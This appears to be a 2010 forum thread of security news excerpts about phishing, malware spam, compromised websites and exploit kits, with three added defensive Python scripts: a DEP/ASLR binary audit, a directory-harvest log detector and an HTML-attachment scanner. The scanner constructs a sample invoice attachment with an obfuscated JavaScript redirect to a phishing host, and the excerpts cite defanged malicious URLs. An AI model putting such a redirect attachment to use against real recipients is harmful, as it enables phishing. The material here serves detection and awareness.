.gov site hosts Phish - UK banks
- http://sunbeltblog.blogspot.com/2010/06/gov-website-plays-host-to-uk-banking.html
June 16, 2010 - "... something rather nasty on the Central Department .gov portal which can be found at central(dot)gov(dot)py... fourteen different banking / financial services phishes including Barclays, Abbey, Northern Rock, Halifax and Lloyds TSB. Clearly, someone is desperate to get their hands on as many UK banking credentials as possible. These phishes are all online at the moment although some appear to be flagged in browsers such as Firefox. We’ve contacted the hosts and hopefully all of the above will be offline shortly."

(Screenshots available at the Sunbelt blog URL above.)


2010-06-22, 02:41

GoDaddy Scam/Phish/Spam
- http://isc.sans.edu/diary.html?storyid=9043
Last Updated: 2010-06-21 23:20:29 UTC - "A number of readers (and myself included) have received an email claiming to be from GoDaddy. The email is grammatically correct, and appears quite genuine. The subject is "GoDaddy.com Order Confirmation" and interestingly the images within the HTML are pulled from imagesak.godaddy.com, excepting one which came from "hxxp ://img.securepaynet.net/bbimage.aspx?pl=somecodeandmyemailaddress". The links in the emails I have seen point to "hxxp ://dextersss-com-ua.1gb.ua/zzx.htm" among others. The phishing site and IP address and domain registration are in the Ukraine."


2010-06-22, 21:46

Lenovo Support website loads malicious IFrame, infects visitors with Trojan
- http://cyberinsecure.com/lenovo-support-website-loads-malicious-iframe-infects-visitors-with-trojan/
June 22, 2010 - "The support site of leading Chinese PC manufacturer Lenovo has been compromised by unknown attackers who injected a rogue IFrame into the pages over the weekend. Security researchers warn that unwary visitors looking for drivers are exposed to several exploits that install the Bredolab trojan onto their computers. According to a report from Vietnamese antivirus vendor Bkis, the pages have been infected since at least Sunday afternoon. However, some users have been reporting getting antivirus warnings when visiting Lenovo’s download website since Saturday. The IFrame points to an exploit kit hosted on a domain called volgo-marun .cn. After performing several checks to determine what vulnerable software they had installed on their computer, the visitors were served with exploits targeting older versions of Internet Explorer, Adobe Reader or Adobe Flash player... At the moment, the malicious executable is detected by only ten of the 41 antivirus products listed on VirusTotal. The entire download.lenovo .com subdomain has been blacklisted by Google’s Safe Browsing service. This means that Firefox or Chrome users should see malware warnings when opening resources hosted on it... Even though the malicious .cn domain appears to be dead at the moment, it could return back online at any time. Therefore, users are advised to stay clear of the Lenovo support website for a couple of days, until the manufacturer has a chance to clean it up and plug the hole that allowed the compromise in the first place."


2010-06-23, 13:55

"Account Verification" - Malicious SPAM
- http://community.websense.com/blogs/securitylabs/archive/2010/06/22/malicious-spam-campign-account-verification.aspx
22 Jun 2010 - "Websense... has detected a malicious spam outbreak with the Subject line "Account Verification". As of June 22, we have counted more than 100,000 of these messages. The attack message is disguised as coming from Digg.com. It asks the recipient to verify their Digg.com account. Clicking the "Password change" link in the email body redirects the user to malicious websites... There are two malicious links in the payload. The first link redirects the user to a site that prompts the user to download a Trojan file (29% detection)*. The second link (in an iframe) redirects the user to a site laden with exploits..."
* http://www.virustotal.com/analisis/708890738629739b7a03eec09a468cbb80bdff09d982ff936b5af79d55e0c061-1277203516
File D38C95FD009D21A46235010C3C9F0A00DCC1E9F6.exe received on 2010.06.22 10:45:16 (UTC)
Result: 12/41 (29.27%)

(Screenshot available at the Websense URL above.)


2010-06-24, 14:22

Targeted attacks with Excel files
- http://www.f-secure.com/weblog/archives/00001975.html
June 24, 2010 - "... fresh set of attacks done with XLS files... This is some sort of personnel list. Like the other examples here, it drops and runs a backdoor when viewed... An apparent agenda... a list of organizations... A budget file... FIFA World Cup 2010 match schedule... The exploit in these files targets Excel Pointer Offset Memory Corruption Vulnerability CVE-2009-3129*. As you can see, such attack files can look like perfectly normal and credible document files..."
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3129
CVSS v2 Base Score: 9.3 (HIGH)

(Screenshots available at the F-secure URL above.)


2010-07-01, 22:04

DEP & ASLR ignored...
- http://krebsonsecurity.com/2010/07/top-apps-largely-forgo-windows-security-protections/
July 1st, 2010 - "... Attackers usually craft software exploits so that they write data or programs to very specific, static sections in the operating system’s memory. To counter this, Microsoft introduced with Windows Vista (and Windows 7) a feature called address space layout randomization or ASLR, which constantly moves these memory points to different positions. Another defensive feature called data execution prevention (DEP) — first introduced with Windows XP SP2 back in 2004 — attempts to make it so that even if an attacker succeeds in guessing the location of the memory point they’re seeking, the code placed there will not execute or run... Secunia found that at least 50 percent of the applications examined — including Apple Quicktime, Foxit Reader, Google Picasa, Java, OpenOffice.org, RealPlayer, VideoLAN VLC Player, and AOL‘s Winamp — still do not invoke either DEP or ASLR. Secunia said DEP adoption has been slow and uneven between operating system versions, and that ASLR support is improperly implemented by nearly all vendors..."

- http://www.theregister.co.uk/2010/07/02/win_app_security_defences/
2 July 2010

- http://secunia.com/gfx/pdf/DEP_ASLR_2010_paper.pdf
June 29, 2010
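The Secunia finding above is something a defender can check for themselves: DEP and ASLR opt-in are two flags in the PE optional header (IMAGE_DLLCHARACTERISTICS_NX_COMPAT and IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE), so an inventory of installed applications can be audited without running them. The script below is an added example, not code from Krebs, Secunia or any vendor named in the post; the PE images it inspects are constructed in memory so it runs offline, and the flag values and header offsets are taken from the PE/COFF format specification.

```python
"""Audit whether a Windows PE binary opts in to DEP and ASLR.

Added example (not from the Krebs/Secunia articles): reads the PE optional
header and reports the two linker flags that DEP and ASLR depend on:
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (0x0040) and
IMAGE_DLLCHARACTERISTICS_NX_COMPAT (0x0100). The sample images below are
constructed in memory so the script runs without any real binaries.
"""
import struct

DYNAMIC_BASE = 0x0040   # ASLR opt-in
NX_COMPAT = 0x0100      # DEP opt-in
PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B


def pe_mitigations(data: bytes) -> dict:
    """Return {'format', 'aslr', 'dep'} for a PE image, or raise ValueError."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF file header is 20 bytes; the optional header follows it.
    opt = e_lfanew + 4 + 20
    size_opt = struct.unpack_from("<H", data, e_lfanew + 4 + 16)[0]
    if size_opt < 72 or len(data) < opt + 72:
        raise ValueError("optional header too short")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+.
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "format": "PE32+" if magic == PE32PLUS_MAGIC else "PE32",
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "dep": bool(dll_chars & NX_COMPAT),
    }


def build_sample_pe(dll_chars: int, magic: int = PE32_MAGIC) -> bytes:
    """Construct a minimal, non-runnable PE header carrying the given DllCharacteristics (test data)."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos = dos.ljust(e_lfanew, b"\0")
    size_opt = 0xE0 if magic == PE32_MAGIC else 0xF0
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, size_opt, 0x0102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, dll_chars)
    return dos + b"PE\0\0" + coff + bytes(opt)


def audit(named_blobs):
    """Summarise mitigation status for a list of (name, bytes) pairs."""
    rows = []
    for name, blob in named_blobs:
        try:
            m = pe_mitigations(blob)
            rows.append((name, m["format"], m["aslr"], m["dep"]))
        except ValueError as exc:
            rows.append((name, "error: %s" % exc, False, False))
    return rows


if __name__ == "__main__":
    samples = [
        ("hardened.exe", build_sample_pe(DYNAMIC_BASE | NX_COMPAT, PE32PLUS_MAGIC)),
        ("legacy_player.exe", build_sample_pe(0)),
        ("dep_only.exe", build_sample_pe(NX_COMPAT)),
    ]
    for name, fmt, aslr, dep in audit(samples):
        print("%-18s %-6s ASLR=%-5s DEP=%s" % (name, fmt, aslr, dep))
```

To run it against real binaries, feed `audit()` pairs such as `(path, open(path, "rb").read())`. Note that the flags only show what the linker opted into: DEP can still be forced system-wide by policy, and a DYNAMIC_BASE image only gets full ASLR benefit if the DLLs it loads are also relocatable, which is the "improperly implemented" point the post makes.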


2010-07-03, 22:04

Malware SPAM... Paypal fraud
- http://techblog.avira.com/2010/07/03/malware-outbreak-paypal-security-warning/en/
July 3, 2010 - "There is a new wave of emails pretending to come from Paypal having a ZIP archive attached. The email claims that your Paypal account has been accessed by a third party and, in order to protect your account, the Paypal account has been locked. The user is invited to review the report attached to the email, a ZIP archive, containing a single executable file with a naming scheme like account-<number>-report.exe. There is no link inside the email, so everything is “easy to use”: the recipient of the mail needs just to extract the file and execute it... DON'T DO THAT as the ZIP archive contains a malware detected by all Avira products as dropper DR/Delphi.Gen."

- http://isc.sans.edu/diary.html?storyid=9118
Last Updated: 2010-07-03 22:35:44 UTC - "... 'Delivery Status Notification Failure'... Trojan.bredo... now using NDR and Failure reports to attempt to further their malicious activity."


2010-07-12, 12:46

SPAM with malware increases - botnet recruiting...
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=225702834
July 9, 2010 - "... According to Symantec*, spammers appear to be "trying to make up for the loss of several zombie networks, due to legal actions." In other words, they're pumping out spam with malware in an attempt to build their botnets back up to full strength, adding as many compromised - aka zombie - PCs as they can... attackers have also been creating more phishing websites that spoof Google's social networking site Orkut, especially in Brazilian Portuguese, since Orkut's biggest traction is in Brazil, said Symantec... This attention to detail may result from the need to trick the maximum number of people during the short window that a phishing site remains active - just 54 hours, according to Symantec - before it gets shut down."
* http://www.symantec.com/connect/blogs/spam-and-phishing-landscape-july-2010


2010-07-12, 21:33

DynDNS - malware sites
- http://sunbeltblog.blogspot.com/2010/07/dyndns-hosts-malware-sites.html
July 12, 2010 - "Over the past month or so we've seen quite a lot of malware coming from sub-domains of DynDNS .com, which is a dynamic DNS provider... The sub-domains are changing every (few) hours, though the folder and file name generally do not. The sub-domains, which appear to be semi-randomly named, usually resolve to this IP:
The files coming down are typically detected as Trojan.Win32.Alureon, Trojan-Downloader.Win32.FraudLoad, and Trojan.Win32.FakeAlert — although detection among major antivirus providers is spotty and varies wildly by file...
Bottom line: any company that makes available services allowing anonymous users to post or distribute content/files for free will become a preferred means for distributing malware. These services have a responsibility to police the use of their free services."

(More detail available at the Sunbelt URL above.)


2010-07-14, 00:12

More malicious ZBot SPAM...
- http://www.sophos.com/blogs/gc/g/2010/07/13/malicious-payment-request-from-email-attack-strikes-inboxes/
July 13, 2010 - "... Malicious hackers have spammed out the latest incarnation of a campaign designed to compromise your computer - this time disguising their emails as though they were payment requests from eBay. The emails have a blank message body, but have a file called form.html attached... Of course it's a sneaky piece of social engineering on the behalf of the hackers. Many people would be tempted to open the attachment to find out what on earth the email is about... And opening the attachment (which Sophos detects as Troj/JSRedir-BV) redirects your web browser to a recently compromised webpage on a legitimate site infected with Mal/Iframe-Q... Firstly, your browser is redirected to a spam-related website (for instance, a Canadian pharmacy store). This may make you believe that the attack is merely designed to advertise medications on behalf of the spammers... Furthermore, however, a malicious iFrame also downloads further malware from other third-party websites. This malware can obviously be changed at anytime, but we have seen versions of the ZBot family of malware be distributed in the attack... the emails don't have to pretend to be from eBay to be malicious. Recently we've seen other criminal email campaigns with dangerous html attachments involving Adult Friend Finder, romantic interest & Skype purchases, Facebook porn & Skype payment problems, and Facebook password resets amongst others."


2010-07-14, 18:45

Cyber fraud and banks ...
- http://krebsonsecurity.com/2010/07/the-case-for-cybersecurity-insurance-part-ii/
July 14, 2010 - "... When consumers lose money due to cyber fraud, retail banks are required by law to refund the money — provided the victim doesn’t wait too long in reporting the unauthorized charges. Commercial banks, however, are under no such obligation, although they usually will work with the victim customer to try to reverse as many of the fraudulent transfers as possible... the attackers also evaded procedural security measures the company put in place to ensure that two employees signed off on every transaction..."

Further reading: The Case for Cybersecurity Insurance, Part I
- http://krebsonsecurity.com/2010/06/the-case-for-cybersecurity-insurance-part-i/


2010-07-15, 15:58

SPAM via DHA on the increase...
- http://www.symantec.com/connect/blogs/spammers-harvesting-high-gear
July 15, 2010 - "... observed a dramatic increase in the directory harvest attack (DHA*) method. There was a staggering 15 times increase in DHA attacks during the first week of July 2010 when compared to the same period in June 2010. The spike was observed in the second week of June and is still rife. *So what exactly is a directory harvest attack? It is one of the methods spammers use to gather valid email addresses. One of the ways to generate email addresses to carry out this attack is by creating all possible alphanumeric combinations that could be used for the username part of an email address (up to a maximum length) and appending it to a domain. Alternatively, the dictionary attack method is used to generate email addresses, which is the preferred tactic of spammers... The list of valid email addresses collected by this attack method potentially improves the spammers’ deliverability and conversion rate by targeting a set of only valid email addresses. In addition, these valid email addresses can also be sold as email lists in the underground economy..."

- http://isc.sans.edu/diary.html?storyid=9175
Last Updated: 2010-07-15 15:18:33 UTC

It -will- take some time for SPAM blockers and AV to catch up with this...
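The harvest pattern the Symantec post describes leaves a recognisable trace on the receiving MTA: one client address producing many "user unknown" rejections across many different recipient names, with few or no accepted messages. The following is an added example (not Symantec's or SANS's code) that scores client IPs from such log lines; the log lines are constructed in a Postfix-like shape, the regular expressions assume that shape, and the thresholds are illustrative.

```python
"""Flag directory harvest attacks (DHA) from MTA logs.

Added example, not from the Symantec post: a harvester probes many distinct
recipient names from one source and keeps the ones that are not rejected, so
the log signature is one client IP with many 'user unknown' rejections across
many different recipients and few accepted messages. The lines below are
constructed in a Postfix-like format; real deployments should adapt the
regular expressions to their own MTA.
"""
import re
from collections import defaultdict

REJECT_RE = re.compile(
    r"reject: RCPT from \S*?\[(?P<ip>[\d.]+)\]: 5\d\d [\d.]+ <(?P<rcpt>[^>]+)>: "
    r"Recipient address rejected")
ACCEPT_RE = re.compile(r": [0-9A-F]+: client=\S*?\[(?P<ip>[\d.]+)\]")


def _reject(ip, rcpt):
    # Constructed sample line (shape of a Postfix 'user unknown' rejection).
    return ("Jul 15 10:01:02 mx postfix/smtpd[1234]: NOQUEUE: reject: RCPT from "
            "unknown[%s]: 550 5.1.1 <%s>: Recipient address rejected: User unknown in "
            "local recipient table; from=<offer@example.net> to=<%s> proto=ESMTP "
            "helo=<mail.example.net>" % (ip, rcpt, rcpt))


def _accept(ip):
    # Constructed sample line (shape of Postfix logging an accepted client).
    return "Jul 15 10:01:03 mx postfix/smtpd[1234]: 4A1B2C3D4E: client=unknown[%s]" % ip


SAMPLE_LOG = [
    # Harvester: sweeps an alphabetical list of names; almost everything bounces.
    *[_reject("203.0.113.5", n + "@example.com")
      for n in ("aaron", "abby", "abel", "abigail", "adam", "adrian", "aiden", "alan")],
    _accept("203.0.113.5"),
    # Legitimate sender with one typo in a recipient address.
    _reject("198.51.100.7", "alcie@example.com"),
    _accept("198.51.100.7"), _accept("198.51.100.7"), _accept("198.51.100.7"),
    # Misconfigured sender hammering one dead address: noisy, but not a harvest.
    *[_reject("192.0.2.9", "bob@example.com") for _ in range(6)],
]


def summarize(lines):
    """Per-client counters: rejects, accepts, and the set of distinct rejected recipients."""
    stats = defaultdict(lambda: {"rejects": 0, "accepts": 0, "unknown": set()})
    for line in lines:
        m = REJECT_RE.search(line)
        if m:
            s = stats[m.group("ip")]
            s["rejects"] += 1
            s["unknown"].add(m.group("rcpt").lower())
            continue
        m = ACCEPT_RE.search(line)
        if m:
            stats[m.group("ip")]["accepts"] += 1
    return stats


def flag_dha(stats, min_distinct=5, min_ratio=0.8):
    """Return client IPs whose pattern looks like a directory harvest.

    Both conditions must hold: many *distinct* unknown recipients (a sweep) and a
    high rejection ratio (the source is guessing rather than sending real mail).
    """
    flagged = []
    for ip, s in stats.items():
        total = s["rejects"] + s["accepts"]
        ratio = s["rejects"] / total if total else 0.0
        if len(s["unknown"]) >= min_distinct and ratio >= min_ratio:
            flagged.append(ip)
    return sorted(flagged)


if __name__ == "__main__":
    stats = summarize(SAMPLE_LOG)
    for ip, s in stats.items():
        print("%-14s rejects=%d accepts=%d distinct_unknown=%d"
              % (ip, s["rejects"], s["accepts"], len(s["unknown"])))
    print("suspected DHA sources:", flag_dha(stats))
```

Requiring distinct recipients, not just a high reject count, is what separates a harvester from a broken sender retrying one dead address; the same counters are what MTAs such as Postfix use for their own address-verification rate limits, so the output is a reasonable input for a temporary block or tarpit rule.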


2010-07-27, 16:06

Fake MS Advisory SPAM...
- http://blog.trendmicro.com/zeuszbot-and-sality-jump-on-the-lnk-exploit-bandwagon/
July 27, 2010 - "... exploits targeting the Windows shortcut zero-day vulnerability have risen in number. It is also now being used to spread ZBOT variants via malicious attachments to spammed messages... with the subject Microsoft Windows Security Advisory... the attached archive contains a malicious .LNK file that Trend Micro proactively detects as LNK_STUXNET.SM. Also included is a malicious .DLL file detected as TROJ_ZBOT.BXW. When the exploit code in the shortcut is triggered, it runs the malware component, which then downloads and executes the main malware, TROJ_ZBOT.BXW. TROJ_ZBOT.BXW is one of the ZBOT 2.0 variants that we spotted earlier this year, highlighting how widespread the vulnerability is now being exploited. SALITY file infectors are now using this vulnerability as well... malware using the LNK vulnerability can spread more easily than those that use the AUTORUN.INF file. Until a patch to resolve the vulnerability is released, even more malware families are likely to exploit it."


2010-08-01, 14:25

Fake jobs, fake checks...
- http://www.secureworks.com/research/threats/big-boss/
July 28, 2010 - "... In April 2010, during the course of an unrelated investigation, SecureWorks' Counter Threat Unit (CTU) discovered a unique variant of the well-known ZeuS trojan... Analysis of the sample revealed that in addition to the ordinary ZeuS functionality of stealing credentials, two new functions had been added:
1. The infected system listens on a random TCP port in order to serve as a SOCKS proxy
2. The infected system establishes a VPN (Virtual Private Network) connection to a remote server using the PPTP (Point-to-Point Tunneling Protocol) functionality built-in to Windows.
Although it is very common for trojans (especially ones designed to aid in financial fraud) to employ proxy server capability, this is the first time that the CTU has seen the use of VPN technology in such software... by employing the very simple VPN functionality built right in to Windows, the criminal bypasses the need to develop complex systems, and can simply route his/her malicious traffic over the VPN... some of the activity CTU observed traversing the proxy botnet at different times.
• Money mule job offer spam through multiple webmail services
• Scraping of job websites to obtain new email addresses to spam...
Essentially, the hackers are logging into online job sites and pulling email addresses of those looking for jobs... criminals have developed sophisticated malware that can intercept and alter transactions in progress, even when two-factor authentication is in play. Antivirus engines are unlikely to catch these malicious programs until it is too late... it would be extremely beneficial if those signing up for a job site are required to read and understand about the different kinds of fraudulent job offers they might receive, what kinds of red flags they might see in a fraudulent offer, along with guidelines for checking out a prospective hirer's legitimacy. If all of these parties were able to block these kinds of abuses, the criminals would find it much more difficult to carry out an operation of this scale."

(More detail and screenshots at the Secureworks URL above.)

- http://www.theregister.co.uk/2010/07/28/automated_check_counterfeiting/
28 July 2010


2010-08-02, 13:15

Malware movies...
- http://blog.trendmicro.com/quicktime-player-allows-movie-files-to-trigger-malware-download/
July 30, 2010 - "... encountered two .MOV files (001 Dvdrip Salt.mov and salt dvdrpi [xtrancex].mov) that both used the recent movie Salt, starring Angelina Jolie. It looks suspicious enough because of its relatively small size compared with regular movie files. When the movie files are loaded to QuickTime, it doesn’t show any live action scenes but leads users to download malware pretending to be either an update codec or another player installation... According to Apple, the two .MOV files do not make use of an exploit, instead “they rely on social engineering to trick the user into downloading the malware disguised as a movie codec. This is -not- related to the vulnerability reported by Secunia*..."
* http://secunia.com/advisories/40729
Release Date: 2010-07-26
Criticality level: Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched
... The vulnerability is confirmed in version 7.6.6 (1671) for Windows..."

More "Salt":
- http://sunbeltblog.blogspot.com/2010/08/not-enough-salt-in-your-clickpotato.html
August 02, 2010


2010-08-03, 13:50

Web 2.0 undermines Enterprise Security...
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=226500076
Aug. 2, 2010 - "More than 80% of security administrators think that Web 2.0 applications - social networking tools, widgets, instant messaging programs, and their ilk - are undermining enterprise security. Furthermore, one in five think that employees rarely or never consider the consequences to corporate security of engaging in such activities as downloading applications from the Internet, streaming video, or using peer-to-peer file-sharing sites. Those results come from a new survey of more than 2,100 IT security administrators in the United States, United Kingdom, France, Japan, and Australia. The survey was conducted by the Ponemon Institute and sponsored by Check Point Software Technologies... The survey also found that nearly half of security managers think that minimizing Web 2.0 risks is an urgent priority. According to respondents, the top threats posed by Web 2.0 applications are, in order, poor workplace productivity, malware, data loss, and viruses..."


2010-08-05, 13:01

(More) tax-themed malicious emails
- http://community.websense.com/blogs/securitylabs/archive/2010/08/04/2010-Tax_2D00_Themed-Malicious-Emails.aspx
4 Aug 2010 - "Websense... has detected a wave of tax-themed malicious email. While the tax theme in spam email is common all year round, it is interesting to see the different strategies malicious authors use in their campaigns. We saw reports last June about email with the subject "Notice of Underreported Income". Today, we have seen a couple of emails having the same subject but with different attack strategies. The first sample below uses a malicious link just like those distributed earlier. Unlike earlier malicious email, which redirects to a fake IRS site that instructs the user to download a malicious file (tax-statement.exe), this link saves the victim a couple of clicks by prompting to download a file (adobe_flash_install.exe) immediately without going to a fake IRS site... The second sample below is more aggressive in that the malicious zip [MD5:dfbb95730b2377cccf8372107bdef503] is attached to the email. It is recognized by 1/42 AV engines via VirusTotal*... In addition to these, we are seeing malicious email with the subject “You are in a higher tax bracket”. It also has a malicious zip [MD5: 3b9c60c761734fcd4ac7a753c93ec5d1] attached to it and is recognized by 1/42 AV engines via VirusTotal*..."
* http://www.virustotal.com/analisis/2bd3d1e8924833d711951794c4eb6ae4d362246950bf33861cf6a2d44a937d85-1280939399
File tax_statement.zip received on 2010.08.04 16:29:59 (UTC)
Result: 1/42 (2.38%)


2010-08-06, 19:01

100+ sites compromised - Media Temple host svrs...
- http://community.websense.com/blogs/securitylabs/archive/2010/08/05/Media-Temple-injections-lead-to-Phoenix-Exploit-Kit.aspx
05 Aug 2010 - "Websense... has discovered that over 100 Web sites on the Media Temple Web host servers have been compromised, and will lead visitors to the Phoenix Exploit Kit. It's not the first time they have had a WordPress injection, but a quick investigation suggests that only 46% of these sites have WordPress installed, and Sucuri Scanner* reveals that they do have multiple vulnerabilities... According to the statement from Media Temple, neither Media Temple’s architecture nor the up-to-date versions of WordPress is the source of these compromises. Some insecure 3rd-party software applications installed on customer servers are the root cause, which has been verified by Sucuri... The Phoenix Exploit Kit** is a sophisticated hacker tool set that exploits several of the latest vulnerabilities on popular vectors to execute arbitrary code..."
* http://sucuri.net/?page=scan

** http://community.websense.com/resized-image.ashx/__size/550x0/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7367.Capture.PNG

- http://weblog.mediatemple.net/weblog/2010/08/06/security-facts/#more-2365
updated 8/6/10 5:10 pm - Recent Attacks...

- http://www.m86security.com/labs/i/Phoenix-Exploit-Kit-2-0,trace.1427~.asp
m86security (Last Reviewed: August 3, 2010)


2010-08-07, 05:01

Rogue AV SPAM...
- http://community.websense.com/blogs/securitylabs/archive/2010/08/06/You-have-Rogue-Mail.aspx
06 Aug 2010 - "Websense... has detected thousands of malicious emails purporting to be from big-brand companies like Target, Macy’s, Best Buy, and Evite... All the malicious URLs associated in the emails above redirect to the same fake AV web site. Users are then prompted to run a malicious executable called "antivirus_24.exe" [MD5: 5be4b708a68687cb5490fe2caea49c82], currently detected by 11/42 AV engines*..."
* http://www.virustotal.com/analisis/5ff1f7a1d1ab4f32ca1defad5f76ba15a2ec2fe57559ddc9747aeceb19db98d6-1281107011
File antivirus_24.exe received on 2010.08.06 15:03:31 (UTC)
Result: 11/41 (26.83%)

- http://ddanchev.blogspot.com/2010/08/spamvertised-best-buy-macys-evite-and.html
August 09, 2010


2010-08-13, 23:24

Red Cross site(s) hacked...
- http://www.esecurityplanet.com/features/print.php/3898516
August 13, 2010 - "Zscaler this week uncovered a new malware scam targeting the Red Cross of Serbia, the second time in five months that hackers have zeroed in on one of the international humanitarian organization's public websites. Hackers managed to inject a malicious JavaScript file, "hxxp ://obsurewax.ru/Kbps .js" into several pages on the Red Cross of Serbia's homepage. Most antivirus software programs now prevent Internet users from accessing the site, but before being caught, the malware could have infected users' machines to capture personal information and spread even more malware and spam... Back in March, the American Red Cross East Shoreline Chapter's website* was hit by a malware campaign that used iframe injections to infect several pages with malicious code and links. Zscaler said it has already notified the Red Cross of Serbia of this latest cyber attack. The assault marks only the latest victory for cyber criminals as they launch ever more numerous efforts to penetrate users' systems and steal critical data..."
* http://research.zscaler.com/2010/03/redcross-site-hacked.html


2010-08-27, 17:42

Obfuscated links in emails using JavaScript
- http://techblog.avira.com/2010/08/27/obfuscated-links-in-emails-using-javascript/en/
August 27, 2010 - "Our spam traps started to receive a bunch of Phishing emails... having no link inside. We know many tricks for hiding the URL (JavaScript, form, etc.) but this one was new: Pretending to be an invoice in HTML format, the attached HTML document displays the same content as in the mail body and immediately redirects to the fake website... The email looks quite usual for spam or Phishing on first sight, but the interesting part comes after analysing the attached HTML document. The document contains, inside the row of a table, a piece of obfuscated JavaScript code. In simple terms, the JavaScript code uses the property of each document called “location” to redirect the web browser to the fake website. The first idea coming to mind is that almost no modern email client executes JavaScript when rendering an HTML document. However, even if the email client (Outlook, Windows Mail, Thunderbird, etc.) doesn’t execute the script, the web browser does. As soon as the user opens the attachment with a double click, the web browser opens it and gets immediately redirected to the fake website. The website wasn’t available anymore when we started to analyze the emails."

(Screenshots available at the URL above.)
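Because the redirect lives in the attachment rather than in a link, a mail gateway that only extracts URLs from the body will miss it; the attachment's own HTML has to be parsed. Below is an added example of such a check (not Avira's code). It builds a constructed message with an HTML attachment whose script assembles its target with `String.fromCharCode`, a common obfuscation assumed here for illustration (the post does not say which technique was used), decodes that so the destination is readable, and flags any assignment to `location`. The target domain `phish.example` is a reserved example name.

```python
"""Inspect HTML e-mail attachments for script-driven redirects.

Added example, not from the Avira post: the mail client may never run the
script, but the browser that opens the double-clicked attachment will, so the
attachment itself is what to scan. The message below is constructed, and the
String.fromCharCode decoding is an assumed obfuscation style, not the one the
post analysed.
"""
import email
import re
from email import policy
from email.message import EmailMessage

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Assignments or calls that move the browser somewhere else ('==' comparisons excluded).
REDIRECT_RE = re.compile(
    r"(?:window|document|top|self|parent)?\s*\.?\s*location"
    r"(?:\.href|\.replace|\.assign)?\s*(?:=(?!=)|\()", re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d,\s]+)\)")
SUSPICIOUS_CALLS = ("eval(", "unescape(", "atob(", "setTimeout(")


def decode_fromcharcode(js):
    """Replace String.fromCharCode(...) calls with the literal they build, so the target is readable."""
    def _sub(m):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return FROMCHARCODE_RE.sub(_sub, js)


def inspect_html(html):
    """Return findings for one HTML document."""
    scripts = SCRIPT_RE.findall(html)
    decoded = [decode_fromcharcode(s) for s in scripts]
    calls = sorted({c for s in scripts for c in SUSPICIOUS_CALLS if c in s})
    return {
        "scripts": len(scripts),
        "redirect": any(REDIRECT_RE.search(s) for s in decoded),
        "decoded": decoded,
        "calls": calls,
    }


def scan_message(raw):
    """Scan every HTML part carried as an attachment; returns one finding per part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        # The HTML body of a normal mail is not an attachment; only named/attached parts matter here.
        if part.get_content_disposition() != "attachment" and not part.get_filename():
            continue
        result = inspect_html(part.get_content())
        result["filename"] = part.get_filename() or "(unnamed)"
        findings.append(result)
    return findings


def build_sample_eml():
    """Constructed phishing-style message: invoice body plus an HTML attachment that redirects."""
    html = (
        "<html><body><table><tr><td>Invoice #1001</td></tr>"
        "<tr><td><script>var h = String.fromCharCode("
        "112,104,105,115,104,46,101,120,97,109,112,108,101);"
        'document.location = "http://" + h + "/login";'
        "</script></td></tr></table></body></html>"
    )
    msg = EmailMessage()
    msg["From"] = "billing@example.net"
    msg["To"] = "victim@example.com"
    msg["Subject"] = "Invoice #1001"
    msg.set_content("Please find your invoice attached.")
    msg.add_attachment(html, subtype="html", filename="invoice.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for f in scan_message(build_sample_eml()):
        print("%s: scripts=%d redirect=%s calls=%s"
              % (f["filename"], f["scripts"], f["redirect"], f["calls"]))
        for js in f["decoded"]:
            print("  decoded script:", js.strip())
```

For a gateway rule, the presence of any `<script>` in an HTML attachment is already a strong signal, since a genuine invoice has no reason to carry one; the decoding step is there so an analyst can see the destination and feed it to blocklists without opening the file in a browser.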


2010-08-31, 15:21

SPAM/malware fake delivery failure msgs
- http://tools.cisco.com/security/center/viewAlert.x?alertId=19743
Last: August 30, 2010 - "... significant activity related to spam e-mail messages that inform the recipient about the delivery failure of a United Parcel Service (UPS) shipment. The message instructs the recipient to print a label in the attached .zip file and collect the package from a UPS office. However, the attachment actually contains a malicious .exe file that, if executed, attempts to infect the user's system with malicious code...
Subject: UPS Delivery Problem RN 26489...
Subject: UPS INVOICE NR9030102...
Subject: Fedex Item Status N7185272..."

- http://labs.m86security.com/2010/08/fedex-spam-seeding-new-asprox-binary/


2010-09-03, 15:56

iTunes v10 - Ping SPAM...
- http://www.sophos.com/blogs/chetw/g/2010/09/02/apple-pingd-comment-spam-coming/
September 2nd, 2010 - "Apple launched iTunes 10 yesterday along with their updated hardware platforms. Aside from supporting the newest generation of iPod and Apple TV devices, this new version of iTunes also introduces a new social media service branded as Ping. If you use iTunes, you should definitely update to iTunes 10 as it fixes thirteen separate vulnerabilities... apparently Apple didn't consider this when designing Ping, as the service implements no spam or URL filtering. It is no big shock that less than 24 hours after launch, Ping is drowning in scams and spams."

- http://www.newsfactor.com/story.xhtml?story_id=003000C9B0YI
